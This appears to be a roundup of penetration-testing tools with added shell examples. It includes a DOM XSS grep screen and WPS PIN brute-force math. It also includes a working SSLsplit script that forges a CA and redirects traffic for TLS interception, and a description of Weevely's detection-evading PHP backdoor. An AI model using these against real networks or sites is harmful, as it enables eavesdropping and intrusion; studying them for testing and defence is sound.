Linux

Dominator

DOMinator is a Firefox-based tool for the analysis and identification of DOM-based Cross-Site Scripting (DOM XSS) issues. It was the first runtime tool to help security testers find DOM XSS: instead of pattern-matching source code, it watches the page execute and follows attacker-controlled data (such as the URL fragment) to the dangerous sinks (such as innerHTML or eval) it reaches.

DOMinator is available in two editions: Free and Professional. The Free edition is open to the community; the Pro edition adds better support, a more intuitive GUI, and a more extensive rule base and knowledge base.
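
The kind of source-to-sink flow DOMinator looks for, shown as an added example that is not DOMinator's code: a grep-based pre-screen over a constructed page script. The source and sink lists and the sample JavaScript are made up for this illustration. It only catches flows that sit on one line, which is exactly why runtime taint tracking is needed for the rest.

```sh
#!/bin/sh
# Added example (not DOMinator's code): a static pre-screen for DOM XSS
# candidates, i.e. lines where an attacker-controlled source (URL fragment,
# document.URL, window.name, ...) reaches a dangerous sink (innerHTML, eval,
# document.write, ...). The source/sink lists and the sample script are
# constructed for this illustration. Same-line matching is all grep can do;
# flows split across statements need runtime taint tracking, which is the gap
# DOMinator fills.
set -eu

SOURCES='location\.(hash|search|href)|document\.(URL|referrer|cookie)|window\.name'
SINKS='innerHTML|outerHTML|document\.write(ln)?|eval\(|setTimeout\(|insertAdjacentHTML|\.src *='

# Constructed sample page script, written to the file named in $1.
write_sample() {
    cat > "$1" <<'EOF'
// constructed sample, not code from any real site
document.getElementById('out').innerHTML = location.hash.slice(1);   // source -> sink
document.getElementById('out').textContent = location.search;        // source, safe sink
eval(document.URL.split('#')[1]);                                     // source -> sink
var w = window.name;                                                  // source on this line...
document.write(w);                                                    // ...sink on the next: not matched
EOF
}

# Lines (with line numbers) that mention both a source and a sink.
domxss_candidates() {
    grep -nE "$SOURCES" "$1" | grep -E "$SINKS" || true
}

# Number of candidate lines in the file named in $1.
domxss_candidate_count() {
    domxss_candidates "$1" | wc -l | tr -d ' '
}

# Usage: sh domxss-grep.sh            (runs on the constructed sample)
#        sh domxss-grep.sh app.js     (runs on your own script)
if [ $# -gt 0 ]; then
    domxss_candidates "$1"
else
    tmp=$(mktemp); write_sample "$tmp"; domxss_candidates "$tmp"; rm -f "$tmp"
fi
```

On the sample this reports the innerHTML and eval lines and misses the window.name flow into document.write because the source and the sink are on different lines; treat every hit as a lead to confirm in the browser, and expect the runtime tool to find flows this screen cannot.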

Openpuff

OpenPuff is a professional steganography tool:
•HW-seeded random number generator (CSPRNG)
•Deniable steganography
•Carrier chains (up to 256 MB of hidden data)
•Selectable carrier-bit usage level
•Modern multi-cryptography (16 algorithms)
•Multi-layered data obfuscation (3 passwords)
•Chi-squared (X²) steganalysis resistance

Unique layers of security and obfuscation:
•256-bit + 256-bit symmetric-key cryptography with KDF4 password extension
•256-bit symmetric-key data scrambling (CSPRNG-based shuffling)
•Data whitening (CSPRNG-based noise mixing)
•Adaptive non-linear carrier bit encoding

Weevely Php Backdoor

Weevely is a stealth PHP web shell that simulates an SSH-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free-hosted ones.

Official website:
http://epinna.github.com/Weevely/

Getting started with a quick Tutorial:
https://github.com/epinna/Weevely/wiki/Tutorial

Or show list of available Modules and backdoor Generators:
https://github.com/epinna/Weevely/wiki/Modules-list
https://github.com/epinna/Weevely/wiki/Generators-list

Main features:
* More than 30 modules to automate administration and post exploitation tasks:
o Execute commands and browse the remote filesystem, even under PHP security restrictions
o Audit common server misconfigurations
o Run SQL console pivoting on target machine
o Proxy your HTTP traffic through target
o Mount target filesystem to local mount point
o File transfer from and to target
o Spawn reverse and direct TCP shells
o Bruteforce SQL accounts through target system users
o Run port scans from target machine
o And so on..

* Backdoor communications are hidden in HTTP Cookies
* Communications are obfuscated to bypass NIDS signature detection
* Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection

Weevely's author keeps Dissecting, a security-related blog:
http://disse.cting.org/

BackTrack Linux 5r2-PenTesting Edition Lab

The BackTrack Linux 5r2-PenTesting Edition lab is an all-in-one penetration testing lab environment that includes all of the hosts, network infrastructure, tools, and targets necessary to practice penetration testing. It includes:

- A master (base) host utilizing BackTrack Linux 5r2
- A DMZ network with two hosts (targets)
- An “internal” network with one host (target)
- A pre-configured firewall

Phantom JS

PhantomJS is a headless WebKit browser with a JavaScript API: pages are loaded and driven from a script rather than from a window. It has fast and native support for various web standards: DOM handling, CSS selectors, JSON, Canvas, and SVG. Because it executes a page's own JavaScript, it is useful for automating page interaction, capturing screenshots, and inspecting or manipulating the resulting DOM.

Passw3rd

Passw3rd stores passwords in encrypted files with an easy-to-use command-line interface, plus utilities to use the passwords from code. In its simplest form, the keys are generated per environment and protected by OS access controls, while the encrypted password files are stored in source control (SCM).

Jasager

Jasager is an implementation of Karma (an access point that answers any client's probe request with whatever SSID the client asked for, so devices join it automatically) designed to run on OpenWrt on the Fon (La Fonera) router. It will probably run on most APs with Atheros Wi-Fi cards, but it was designed with the Fon in mind, as it is a nice small AP, which gives it a lot of scope for use in penetration tests and other related fun.

A quick highlight of features:
•Web interface showing currently connected clients with their MAC address, IP address (if assigned) and the SSID they associated with
•The web interface allows control of all Karma features and can either run fully featured through AJAX enabled browsers or just as well through lynx
•Auto-run scripts on both association and IP assignment
•Full logging for later review
•Pluggable module system for easy extensibility
•Basic command line interface so you don't have to remember the different iwpriv commands

Reaver-WPS

Reaver implements a brute-force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover the WPA/WPA2 passphrase: an access point that accepts the correct PIN from an external registrar hands over its current network credentials.
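
Why the PIN space is small enough to brute-force, as an added example that is not Reaver's code: the PIN checksum and the split confirmation of the two halves, worked through in shell. The checksum algorithm is the one hostapd uses; 12345670 is the Wi-Fi Alliance's well-known example PIN. The function and file names are this example's own.

```sh
#!/bin/sh
# Added example (not Reaver's code): why WPS registrar PINs are cheap to
# brute-force. A WPS PIN has 8 digits; the 8th is a checksum over the first 7
# (same algorithm as hostapd's wps_pin_checksum), and the AP answers M4 with a
# NACK when the first 4 digits are wrong before it ever checks the last 3 (M6).
# So the attacker searches at most 10^4 + 10^3 = 11,000 PINs instead of 10^7.
set -eu

# Strip leading zeros so the shell does not read "0123" as octal.
dec() {
    n=$1
    while [ "${n#0}" != "$n" ]; do n=${n#0}; done
    echo "${n:-0}"
}

# Checksum digit for a 7-digit PIN prefix.
wps_checksum() {
    pin=$(dec "$1") accum=0
    while [ "$pin" -gt 0 ]; do
        accum=$((accum + 3 * (pin % 10))); pin=$((pin / 10))
        accum=$((accum + pin % 10));       pin=$((pin / 10))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Full 8-digit PIN for a 7-digit prefix.
wps_pin() {
    printf '%07d%d\n' "$(dec "$1")" "$(wps_checksum "$1")"
}

# Exit 0 iff $1 is an 8-digit PIN with a correct checksum.
wps_pin_valid() {
    case $1 in [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;; *) return 1 ;; esac
    [ "$(wps_checksum "${1%?}")" = "${1#???????}" ]
}

# Attempts needed to reach PIN $1 when the halves are confirmed separately and
# candidates are tried in ascending order: (first half + 1) + (second half + 1).
# Worst case (99999999) is 11000; a naive 8-digit search would be 10^8.
wps_attempts_to_find() {
    first=$(dec "${1%????}")
    rest=${1#????}
    second=$(dec "${rest%?}")
    echo $((first + 1 + second + 1))
}

# Usage: sh wps_pin.sh 1234567   -> prints 12345670 and the attempt count
if [ $# -gt 0 ]; then
    full=$(wps_pin "$1")
    echo "$full"
    echo "attempts with split confirmation: $(wps_attempts_to_find "$full") (max 11000)"
fi
```

The split confirmation is the whole story: if the AP only ever reported success or failure for the complete PIN, the checksum would still leave 10^7 candidates, which is out of reach over the air; with the halves confirmed separately the worst case is 11,000 attempts, which is why WPS PIN lockout and disabling external-registrar PIN mode are the defensive responses.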

Joomscan

JoomScan detects file inclusion, SQL injection and command execution vulnerabilities in a target Joomla! installation.

SSLsplit

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way. SSLsplit removes HPKP response headers in order to prevent public key pinning.

Usage
% sslsplit -h
Usage: sslsplit [options...] [proxyspecs...]
-c pemfile use CA cert (and key) from pemfile to sign forged certs
-k pemfile use CA key (and cert) from pemfile to sign forged certs
-C pemfile use CA chain from pemfile (intermediate and root CA certs)
-K pemfile use key from pemfile for leaf certs (default: generate)
-t certdir use cert+chain+key PEM files from certdir to target all sites
matching the common names (non-matching: generate if CA)
-O deny all OCSP requests on all proxyspecs
-P passthrough SSL connections if they cannot be split because of
client cert auth or no matching cert and no CA (default: drop)
-g pemfile use DH group params from pemfile (default: keyfiles or auto)
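
Putting the options above to work, as an added example that is not part of SSLsplit: a lab gateway script that creates a throwaway CA, adds the NAT redirects that feed connections into SSLsplit, and launches it with options taken from the usage text (-k, -c, -O, -l, -S, -D). The file names, ports, log locations and the assumption that the gateway already routes the victim's traffic and the victim trusts ca.crt are this example's own; DRY_RUN=1 prints each privileged command instead of running it.

```sh
#!/bin/sh
# Added example (not part of SSLsplit): set up a transparent TLS interception
# point on a Linux lab gateway, using only options from SSLsplit's own usage
# text (-k, -c, -O, -l, -S, -D). Assumptions, not from the page: the gateway
# already routes the victim's traffic, the victim trusts ca.crt, and the file
# names, ports and log locations below are arbitrary. DRY_RUN=1 prints each
# privileged command instead of running it.
set -eu

CA_KEY=${CA_KEY:-ca.key}
CA_CRT=${CA_CRT:-ca.crt}
HTTP_PORT=${HTTP_PORT:-8080}
HTTPS_PORT=${HTTPS_PORT:-8443}
LOGDIR=${LOGDIR:-sslsplit-logs}

# Run a command, or just echo it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# 1. Throwaway CA. SSLsplit signs the forged leaf certificates with this key
#    (-k) and cert (-c); the victim must import ca.crt as trusted.
make_ca() {
    run openssl genrsa -out "$CA_KEY" 2048
    run openssl req -new -x509 -days 30 -key "$CA_KEY" -out "$CA_CRT" \
        -subj "/CN=SSLsplit lab CA"
}

# 2. NAT engine: the victim's 80/443 connections are redirected to SSLsplit's
#    listeners, which is how it learns the original destination address.
redirect_rules() {
    run sysctl -w net.ipv4.ip_forward=1
    run iptables -t nat -A PREROUTING -p tcp --dport 80 \
        -j REDIRECT --to-ports "$HTTP_PORT"
    run iptables -t nat -A PREROUTING -p tcp --dport 443 \
        -j REDIRECT --to-ports "$HTTPS_PORT"
}

# 3. SSLsplit invocation: one https and one http proxyspec, OCSP denied (-O)
#    so the client cannot ask the real CA about the forged certificate,
#    connection log (-l) and per-connection content logs (-S).
sslsplit_cmd() {
    printf 'sslsplit -D -k %s -c %s -O -l connections.log -S %s https 0.0.0.0 %s http 0.0.0.0 %s\n' \
        "$CA_KEY" "$CA_CRT" "$LOGDIR" "$HTTPS_PORT" "$HTTP_PORT"
}

main() {
    make_ca
    redirect_rules
    run mkdir -p "$LOGDIR"
    # word splitting of the composed command line is intended here
    run $(sslsplit_cmd)
}

# Usage:  DRY_RUN=1 sh sslsplit-lab.sh run   (preview)   |   sh sslsplit-lab.sh run
if [ "${1:-}" = run ]; then main; fi
```

Two practical caveats follow from the option list itself: without -P, any connection SSLsplit cannot split (client certificate authentication, or no matching certificate and no CA) is dropped rather than passed through, which is visible to the victim as a broken site; and a client that already pinned the real key, or that refuses an unknown CA, will fail regardless of the HPKP header stripping, because pinning and trust decisions made before the interception began are not undone by it.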
